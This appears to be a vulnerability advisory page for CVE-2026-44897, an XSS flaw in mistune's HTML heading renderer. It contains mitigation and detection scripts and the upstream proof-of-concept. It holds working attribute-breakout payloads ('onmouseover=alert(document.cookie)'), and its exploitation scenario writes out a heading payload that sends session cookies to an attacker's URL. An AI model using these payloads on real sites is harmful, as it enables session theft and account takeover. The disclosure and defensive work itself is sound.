CVE-2026-44897: mistune: XSS via unescaped heading id= attribute

GHSA-v87v-83h2-53w7 MEDIUM
Published May 9, 2026
CISO Take

Mistune's HTML renderer writes heading IDs into the id= attribute without escaping, so an attacker who controls heading text can break out of the attribute and inject JavaScript event handlers. The flaw is reachable only when add_toc_hook() is given a custom heading_id callback that derives the ID from heading text. The upstream advisory describes this slug-anchor pattern as by far the most common use of the callback, so any deployment that generates human-readable anchors should be treated as affected unless the callback sanitizes its own output. With 463 downstream dependents spanning documentation platforms, wikis, and AI-powered content pipelines, and a full working PoC already published, the exploitation bar is low once malicious content reaches a rendered page. Upgrade to mistune 3.2.1 immediately, or, as an interim workaround, pass every heading_id callback return value through html.escape().

Sources: GitHub Advisory, NVD, OpenSSF, ATLAS

What is the risk?

Medium risk overall, elevated in AI/ML deployments where LLM-generated or user-submitted Markdown is rendered with mistune. The vulnerability only activates when a custom heading_id callback is in use, but this is the dominant real-world usage pattern for any documentation or wiki platform. No CISA KEV listing and no active exploitation reported, but the PoC is published and reproducible in minutes. The OpenSSF Scorecard of 5.2/10 and package risk score of 26/100 indicate broader supply chain hygiene concerns beyond this specific issue. Risk compounds in agentic pipelines where AI-generated content is rendered before human review.

How does the attack unfold?

  1. Content Injection (AML.T0049): Attacker submits Markdown containing a heading with a double-quote XSS payload to a mistune-powered platform such as a wiki, documentation site, chatbot UI, or RAG document store.

  2. Attribute Breakout: Mistune's heading() renderer passes the raw heading_id callback return value into the id= attribute without escaping; the double-quote terminates the attribute and the injected event handler becomes valid HTML.

  3. Payload Execution (AML.T0078): A privileged user visits the rendered page and interacts with the heading element, triggering the injected JavaScript event handler silently in their authenticated browser context.

  4. Session Compromise (AML.T0025): The JavaScript payload exfiltrates session cookies or auth tokens to attacker-controlled infrastructure, enabling account takeover, lateral movement, or data exfiltration within the platform.
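
The attribute breakout can be reproduced without installing mistune. The sketch below is a simplified stand-in for the renderer logic quoted in the original advisory, not the library's code: `heading_vulnerable`, `heading_escaped`, and `parsed_attrs` are hypothetical names, and the escaped variant shows one plausible shape of a fix rather than the actual 3.2.1 patch.

```python
import html
from html.parser import HTMLParser


def heading_vulnerable(text: str, level: int, **attrs) -> str:
    """Stand-in for the unpatched logic: the id value is concatenated raw."""
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        out += ' id="' + _id + '"'
    return out + ">" + text + "</" + tag + ">\n"


def heading_escaped(text: str, level: int, **attrs) -> str:
    """Same logic, but the id value is HTML-escaped before insertion."""
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        out += ' id="' + html.escape(_id, quote=True) + '"'
    return out + ">" + text + "</" + tag + ">\n"


class AttrCollector(HTMLParser):
    """Records the attribute names an HTML parser sees on each start tag."""

    def __init__(self):
        super().__init__()
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.attr_names.extend(name for name, _ in attrs)


def parsed_attrs(markup: str) -> list:
    """Return the attribute names found in a fragment of markup."""
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attr_names


payload = 'foo" onmouseover="alert(document.cookie)" x="'
body = html.escape(payload)  # the heading body is already escaped upstream

print(parsed_attrs(heading_vulnerable(body, 2, id=payload)))  # id plus injected attributes
print(parsed_attrs(heading_escaped(body, 2, id=payload)))     # id only
```

Counting parsed attributes, rather than searching the string for `onmouseover`, checks what a parser would actually treat as an attribute on the heading element.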

What systems are affected?

Package Ecosystem Vulnerable Range Patched
mistune pip <= 3.2.0 3.2.1

If you use mistune 3.2.0 or earlier with a custom heading_id callback, you are affected.
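
To check whether an environment falls inside the vulnerable range, something like the following may help. It is a minimal sketch: `parse_release`, `is_vulnerable`, and `installed_mistune_status` are hypothetical helper names, and the parser compares only the leading numeric release components, so pre-release suffixes such as `rc1` are ignored.

```python
import re
from importlib import metadata

PATCHED = (3, 2, 1)  # first fixed release according to the advisory


def parse_release(version: str) -> tuple:
    """Extract leading numeric components, e.g. '3.2.0' -> (3, 2, 0)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(p) for p in match.group(0).split("."))
    # Pad short versions such as '3.2' so tuple comparison behaves as expected.
    return parts + (0,) * (3 - len(parts))


def is_vulnerable(version: str) -> bool:
    """True when the release is older than the patched version."""
    return parse_release(version) < PATCHED


def installed_mistune_status() -> str:
    """Describe the mistune version installed in the current environment."""
    try:
        version = metadata.version("mistune")
    except metadata.PackageNotFoundError:
        return "mistune is not installed in this environment"
    state = "VULNERABLE" if is_vulnerable(version) else "patched"
    return f"mistune {version}: {state}"


print(installed_mistune_status())
```

A version below 3.2.1 is only exploitable when a text-derived heading_id callback is also in use, so a VULNERABLE result is a prompt to audit the callback, not proof of exposure.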

How severe is it?

CVSS 3.1
6.1 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 13% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps
  1. Upgrade mistune to 3.2.1 (patched release).

  2. If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it.

  3. Audit all codebases using add_toc_hook() with a custom heading_id parameter — search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code.

  4. For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6).

  5. Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.
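
The interim workaround in step 2 could look roughly like this. It is a sketch under stated assumptions: the callback signature `(token, index)` is taken from the PoC in the original advisory, while `escaped_heading_id` and `slug_heading_id` are hypothetical helpers and not part of mistune.

```python
import html
import re
from functools import wraps


def escaped_heading_id(callback):
    """Wrap a heading_id callback so its return value is safe inside id="..."."""
    @wraps(callback)
    def wrapper(token, index):
        return html.escape(str(callback(token, index)), quote=True)
    return wrapper


def slug_heading_id(token, index):
    """Stricter alternative: build the id from an allowlist of characters."""
    text = str(token.get("text", "")).lower()
    slug = re.sub(r"[^a-z0-9]+", "-", text).strip("-")
    # Fall back to a positional id when nothing usable remains.
    return slug or f"section-{index}"


@escaped_heading_id
def raw_id(token, index):
    # Same callback as the advisory's PoC, now wrapped.
    return token.get("text", "")


token = {"text": 'foo" onmouseover="alert(document.cookie)" x="'}
print(raw_id(token, 0))           # quotes arrive as &quot; entities
print(slug_heading_id(token, 0))  # letters, digits, and hyphens only
```

Either callback would be passed as `add_toc_hook(md, heading_id=...)`, as in the PoC. The allowlist slug is arguably the safer long-term choice: if the patched renderer escapes the id itself, an escaping wrapper left in place after the upgrade would double-escape characters such as `&`.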

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system design and development
NIST AI RMF
MANAGE 2.2 - Risk response for AI systems
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-44897?

CVE-2026-44897 (GHSA-v87v-83h2-53w7) is a cross-site scripting flaw in mistune's HTMLRenderer.heading(), which concatenates the heading id value into the HTML without escaping. When add_toc_hook() is used with a custom heading_id callback that returns heading text, a double quote in a heading ends the id= attribute and lets an attacker inject event-handler attributes. Versions up to and including 3.2.0 are affected; 3.2.1 is the patched release.

Is CVE-2026-44897 actively exploited?

No confirmed active exploitation of CVE-2026-44897 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44897?

  1. Upgrade mistune to 3.2.1 (patched release).

  2. If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it.

  3. Audit all codebases using add_toc_hook() with a custom heading_id parameter: search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code.

  4. For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6).

  5. Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.
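
The detection step can be partly automated. After a successful breakout the quote no longer sits inside the id value; what appears instead is an extra attribute on the heading. The sketch below therefore flags event-handler attributes on h1–h6 elements. `HeadingAuditor` and `audit_headings` are hypothetical names, and the check is a heuristic rather than a complete XSS scanner.

```python
from html.parser import HTMLParser

HEADING_TAGS = {"h1", "h2", "h3", "h4", "h5", "h6"}


class HeadingAuditor(HTMLParser):
    """Collects event-handler attributes found on heading elements."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in HEADING_TAGS:
            return
        for name, value in attrs:
            # on* attributes (onmouseover, onclick, ...) are not expected
            # on headings produced by a Markdown renderer.
            if name.startswith("on"):
                self.findings.append((tag, name, value))


def audit_headings(markup: str) -> list:
    """Return (tag, attribute, value) tuples for suspicious heading attributes."""
    auditor = HeadingAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


rendered = '<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo</h2>\n'
clean = '<h2 id="toc_1">Introduction</h2>\n'

print(audit_headings(rendered))
print(audit_headings(clean))
```

Running this over stored or cached rendered pages gives a quick signal of whether a payload has already landed; an empty result does not prove the callback is safe.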

What systems are affected by CVE-2026-44897?

This vulnerability affects the following AI/ML architecture patterns: Documentation generators and portals, RAG pipelines with Markdown rendering, AI chatbot UIs rendering LLM output, ML model card platforms, Interactive notebooks with Markdown cells.

What is the CVSS score for CVE-2026-44897?

CVE-2026-44897 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.23%.

What is the AI security impact?

Affected AI Architectures

  • Documentation generators and portals
  • RAG pipelines with Markdown rendering
  • AI chatbot UIs rendering LLM output
  • ML model card platforms
  • Interactive notebooks with Markdown cells

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0051.001 Indirect
AML.T0078 Drive-by Compromise

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

## Summary

`HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML, with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like `#installation` or `#getting-started`, is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute.

## Details

**File:** `src/mistune/renderers/html.py`

```python
def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'  # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"
```

The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `&quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned; no escaping occurs at any point in the pipeline.

## PoC

**Step 1: Establish the baseline (safe default IDs)**

The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs:

```python
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)  # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
```

Output (the ID is auto-generated, no user text appears in it):

```html
<h2 id="toc_1">Introduction</h2>
```

**Step 2: Add the realistic trigger: a text-based `heading_id` callback**

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version, returning the raw heading text unchanged, to show the vulnerability without any extra transformation:

```python
def raw_id(token, index):
    return token.get("text", "")  # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
```

**Step 3: Craft the exploit payload**

Construct a heading whose text contains a double-quote followed by an injected attribute:

```
## foo" onmouseover="alert(document.cookie)" x="
```

When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value.

**Step 4: Observe attribute breakout in the output**

```python
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
```

Actual output:

```html
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
```

Note: the heading **body text** is correctly escaped (`&quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted.

### Script

A verification script was created to verify this issue. It creates an HTML page showing the bypass rendering in the browser.

```python
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook


def raw_id(token, index):
    return token.get("text", "")


# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""


def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""


page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")
```

Example Usage:

```bash
python poc.py
```

Once the script is run, open `report_h2.html` in the browser and observe the behaviour.

## Impact

| Dimension | Assessment |
|-----------|------------|
| **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| **Integrity** | DOM manipulation, phishing content injection, forced navigation |
| **Availability** | Page freeze or crash available to attacker |

**Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value.

Exploitation Scenario

An adversary targeting an AI documentation platform or knowledge base powered by mistune crafts a Markdown document with the heading: '## Getting Started" onmouseover="fetch(atob(base64_encoded_exfil_url)+document.cookie)" x="'. The document is submitted to a wiki, uploaded as a model card, or injected into a RAG document store. When a privileged user — an admin, auditor, or CISO reviewing a compliance report — views the rendered page and moves their cursor over the heading, the injected event handler fires silently, exfiltrating their session token to attacker-controlled infrastructure. In a RAG pipeline context, a poisoned retrieval document could deliver the same payload against a security analyst's browser session when AI-summarized results are displayed.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body; element attributes (such as src="XYZ"); URIs; JavaScript sections; Cascading Style Sheets and style property; etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
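
The 6.1 base score follows from this vector by the CVSS v3.1 base-score equations. The sketch below is a minimal calculator for base metrics only, using the metric weights from the public specification; `base_score` and `roundup` are illustrative names, and temporal and environmental metrics are not handled.

```python
import math

WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when scope is changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score from a vector string."""
    prefix, *metrics = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("only CVSS:3.1 vectors are supported")
    m = dict(item.split(":") for item in metrics)
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]

    # Impact sub-score
    iss = 1 - (
        (1 - WEIGHTS["C"][m["C"]])
        * (1 - WEIGHTS["I"][m["I"]])
        * (1 - WEIGHTS["A"][m["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    exploitability = (
        8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"))  # 6.1
```

For this vector the impact term is about 2.73 and the exploitability term about 2.84; the changed-scope multiplier of 1.08 gives roughly 6.007, which rounds up to 6.1.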

Timeline

Published
May 9, 2026
Last Modified
June 1, 2026
First Seen
May 9, 2026

Related Vulnerabilities